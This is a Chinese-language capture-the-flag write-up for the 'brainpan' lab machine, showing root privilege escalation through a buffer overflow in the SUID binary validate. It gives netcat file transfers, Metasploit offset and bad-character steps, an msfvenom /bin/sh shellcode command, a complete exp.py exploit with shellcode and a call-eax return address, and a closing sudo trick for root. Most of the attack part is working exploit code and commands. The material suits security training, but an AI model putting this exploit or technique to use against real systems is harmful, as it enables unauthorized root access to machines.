brainpan(suid溢出提权)

参考资料:Sneaky(suid+缓冲区溢出提权)

上一篇
得到了一个普通权限的shell,通过suid的缓冲区溢出漏洞,得到shell。这也不是第一次遇到了类似情况了。

文件传输

whereis gdb
结果显示客户机没有gdb,所以传输到kali上分析。

1
2
【目标机】nc -lnvp 8080 -w 5 < /usr/local/bin/validate
【kali】nc 192.168.67.130 8080 -w 5 > validate

分析程序

chmod a+x validate

让程序报错

1
2
3
4
gdb validate
run $(python -c "print 'A'*500") 报错
run $(python -c "print 'A'*250") 报错
run $(python -c "print 'A'*100") 正常

直到找到恰当的长度

1
run  $(python -c "print 'A'*150") 报错

找到缓冲区长度116

1
2
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 150

0x39644138

1
2
3
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 150 -q 39644138

Exact match at offset 116

检查坏字符

遇到问题,不知道如何用gdb或者edb检查坏字符。思考后成功找到定位方法。

edb --run /root/Desktop/validate $(python badchar.py)


右下角堆栈面板,选中有很多A字符的地址,右键follow address in dump

A字符的末尾,可以看到01、02、03...输入的字符。可以看到08后面没有09,于是09是坏字符。

以此类推,检查的坏字符有\x09\x0a

badchar.py

1
2
print 'A'*116+"\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

msfelfscan

如果msfelfscan提示命令未找到。

1
2
cd /usr/bin
ln -s /usr/share/framework2/msfelfscan msfelfscan

再次输入msfelfscan -h,即可。

找到EIP跳转的地址

本来想找到JMP ESP栈顶的地址,但是没有找到。

生成shellcode

msfvenom -p linux/x86/exec CMD=/bin/sh -f python -b '\x00\x09\x0a'

exp.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from struct import pack

buf = b""
buf += b"\xb8\x76\x71\xc5\x28\xdb\xc5\xd9\x74\x24\xf4\x5d\x29"
buf += b"\xc9\xb1\x0b\x83\xc5\x04\x31\x45\x11\x03\x45\x11\xe2"
buf += b"\x83\x1b\xce\x70\xf2\x8e\xb6\xe8\x29\x4c\xbe\x0e\x59"
buf += b"\xbd\xb3\xb8\x99\xa9\x1c\x5b\xf0\x47\xea\x78\x50\x70"
buf += b"\xe4\x7e\x54\x80\xda\x1c\x3d\xee\x0b\x92\xd5\xee\x04"
buf += b"\x07\xac\x0e\x67\x27"

buffersize = 116

nop = "\x90" * (buffersize - len(buf))
eax = pack('<L', 0x080484af)
payload = buf + nop + eax

print payload

文件传输

1
2
3
【目标机】nc -lnvp 8080 -w 5 > exp.py
【kali】nc 192.168.67.130 8080 -w 5 < exp.py
cd /usr/local/bin/;./validate $(python /tmp/exp.py)

1
2
3
file /home/anansi/bin/anansi_util
/home/anansi/bin/anansi_util: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, BuildID[sha1]=0x7c0ee1e54fe059d0d83962304a6694199b6535b7, not stripped


sudo -l显示,sudo /home/anansi/bin/anansi_util 这个程序运行不需要密码,所以可以将/bin/bash添加到该程序,sudo以root权限运行该程序,最终获得root权限。

总结

  • msfelfscan用来找到EIP跳转的地址
  • msfvenom -p linux/x86/exec CMD=/bin/sh -f python -b '\x00\x09\x0a'生成shellcode
  • payload = buf + nop + eax ,本次的返回地址是call eax,以前都是使用jmp esp。不太理解eax在这里起到的作用。等以后水平提升了再回头看看吧。